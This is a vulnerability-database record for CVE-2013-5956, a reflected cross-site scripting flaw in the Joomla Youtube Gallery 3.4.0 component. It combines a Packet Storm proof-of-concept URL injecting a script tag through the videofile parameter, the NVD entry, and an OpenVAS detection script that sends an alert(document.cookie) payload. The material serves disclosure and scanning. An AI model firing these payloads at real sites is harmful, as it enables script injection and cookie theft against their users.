ID PACKETSTORM:125732 Type packetstorm Reporter Mahmoud Ghorbanzadeh Modified 2014-03-15T00:00:00
Description
`Hello,
Cross-site
scripting (XSS) vulnerability in the Youtube Gallery 3.4.0 component for Joomla! allows remote attackers to inject arbitrary web
script or HTML via the videofile parameter to /includes/flvthumbnail.php.
POC:
http://SiteAddress/joomla/components/com_youtubegallery/includes/flvthumbnail.php?videofile=<script>alert('XSS')</script>
`
{"id": "PACKETSTORM:125732", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Joomla Youtube Gallery 3.4.0 Cross Site Scripting", "description": "", "published": "2014-03-15T00:00:00", "modified": "2014-03-15T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/", "score": 4.3}, "href": "https://packetstormsecurity.com/files/125732/Joomla-Youtube-Gallery-3.4.0-Cross-Site-Scripting.html", "reporter": "Mahmoud Ghorbanzadeh", "references": [], "cvelist": ["CVE-2013-5956"], "lastseen": "2016-12-05T22:13:08", "viewCount": 8, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2016-12-05T22:13:08", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-5956"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310804336"]}], "modified": "2016-12-05T22:13:08", "rev": 2}, "vulnersScore": 5.0}, "sourceHref": "https://packetstormsecurity.com/files/download/125732/joomlayoutubegallery-xss.txt", "sourceData": "`Hello, \n \nCross-site \nscripting (XSS) vulnerability in the Youtube Gallery 3.4.0 component for Joomla! allows remote attackers to inject arbitrary web \nscript or HTML via the videofile parameter to /includes/flvthumbnail.php. \n \nPOC: \nhttp://SiteAddress/joomla/components/com_youtubegallery/includes/flvthumbnail.php?videofile=<script>alert('XSS')</script> \n`\n"}
{"cve": [{"lastseen": "2021-02-02T06:06:59", "description": "Cross-site scripting (XSS) vulnerability in includes/flvthumbnail.php in the Youtube Gallery (com_youtubegallery) component 3.4.0 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the videofile parameter.", "edition": 4, "cvss3": {}, "published": "2014-04-25T14:15:00", "title": "CVE-2013-5956", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5956"], "modified": "2014-04-25T17:42:00", "cpe": ["cpe:/a:joomlaboat:com_youtubegallery:3.4.0"], "id": "CVE-2013-5956", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5956", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:joomlaboat:com_youtubegallery:3.4.0:*:*:*:*:joomla\\!:*:*"]}], "openvas": [{"lastseen": "2020-05-12T17:25:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-5956"], "description": "This host is installed with Joomla! component youtube gallery and is prone\nto a cross site scripting vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2014-03-17T00:00:00", "id": "OPENVAS:1361412562310804336", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804336", "type": "openvas", "title": "Joomla Component Youtube Gallery Cross Site Scripting Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Joomla Component Youtube Gallery Cross Site Scripting Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:joomla:joomla\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804336\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2013-5956\");\n script_bugtraq_id(66245);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-03-17 17:05:07 +0530 (Mon, 17 Mar 2014)\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Joomla Component Youtube Gallery Cross Site Scripting Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Joomla! component youtube gallery and is prone\nto a cross site scripting vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP GET request and check whether it is able to\nread cookie or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to insufficient validation of 'videofile' HTTP GET parameter\npassed to '/includes/flvthumbnail.php' script.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute arbitrary HTML\nand script code in a users browser session in the context of an affected site and launch other attacks.\");\n\n script_tag(name:\"affected\", value:\"Joomla Youtube Gallery version 3.4.0 and probably other versions.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Joomla Youtube Gallery version 3.8.4 or later.\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2014/Mar/264\");\n script_xref(name:\"URL\", value:\"http://exploitsdownload.com/exploit/na/joomla-youtube-gallery-340-cross-site-scripting\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/125732/Joomla-Youtube-Gallery-3.4.0-Cross-Site-Scripting.html\");\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"joomla_detect.nasl\");\n script_mandatory_keys(\"joomla/installed\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif (!http_port = get_app_port(cpe:CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe:CPE, port:http_port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + \"/components/com_youtubegallery/includes/flvthumbnail.php?video\" +\n \"file=<script>alert(document.cookie)</script>\";\n\nif (http_vuln_check(port:http_port, url:url, check_header:TRUE,\n pattern:\"<script>alert\\(document.cookie\\)</script>\")) {\n report = http_report_vuln_url(port: http_port, url: url);\n security_message(port: http_port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}
